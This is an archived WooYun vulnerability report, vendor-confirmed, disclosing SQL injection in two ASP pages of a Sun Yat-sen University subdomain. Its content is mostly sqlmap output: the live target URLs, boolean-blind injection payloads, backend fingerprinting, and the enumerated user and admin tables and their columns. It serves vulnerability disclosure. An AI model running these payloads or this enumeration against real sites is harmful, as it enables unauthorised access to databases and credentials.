乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-19: 细节已通知厂商并且等待厂商处理中 2015-08-20: 厂商已经确认,细节仅向厂商公开 2015-08-30: 细节向核心白帽子及相关领域专家公开 2015-09-09: 细节向普通白帽子公开 2015-09-19: 细节向实习白帽子公开 2015-10-04: 细节向公众公开
先来一发换个邀请码
http://sps.sysu.edu.cn/zsyx/content.asp?c=72&m=624&n=1330&todo=showinfo
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: n Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: c=72&m=624&n=1330 AND 2045=2045&todo=showinfo---[11:17:03] [INFO] the back-end DBMS is Microsoft Accessweb server operating system: Windows 2008web application technology: Microsoft IIS 7.5, ASP.NET, ASPback-end DBMS: Microsoft AccessDatabase: Microsoft_Access_masterdb[5 tables]+----------+| article || category || message || record || users |+----------+Database: Microsoft_Access_masterdbTable: users[13 columns]+---------+-------------+| Column | Type |+---------+-------------+| cid | numeric || class | non-numeric || content | non-numeric || email | non-numeric || id | numeric || msn | non-numeric || name | numeric || pwd | non-numeric || qq | non-numeric || sid | non-numeric || title | non-numeric || url | non-numeric || userid | numeric |+---------+-------------+Database: Microsoft_Access_masterdbTable: users[13 columns]+---------+-------------+| Column | Type |+---------+-------------+| cid | numeric || class | non-numeric || content | non-numeric || email | non-numeric || id | numeric || msn | non-numeric || name | numeric || pwd | non-numeric || qq | non-numeric || sid | non-numeric || title | non-numeric || url | non-numeric || userid | numeric |+---------+-------------+权限太低 http://sps.sysu.edu.cn/lab/yaoji/productslist.asp?id=453<code> sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=453 AND 2642=2642---[11:15:09] [INFO] the back-end DBMS is Microsoft Accessweb server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, ASPback-end DBMS: Microsoft Access Database: Microsoft_Access_masterdb[6 tables]+-----------+| admin || download || guestbook || news || product || question |+-----------+Database: Microsoft_Access_masterdbTable: admin[6 columns]+------------+-------------+| Column | Type |+------------+-------------+| id | numeric || password | non-numeric || price | non-numeric || product_id | non-numeric || title | non-numeric || username | non-numeric |+------------+-------------+
</code>
你们更专业
危害等级:低
漏洞Rank:5
确认时间:2015-08-20 22:27
谢谢提醒,我们马上处理。
暂无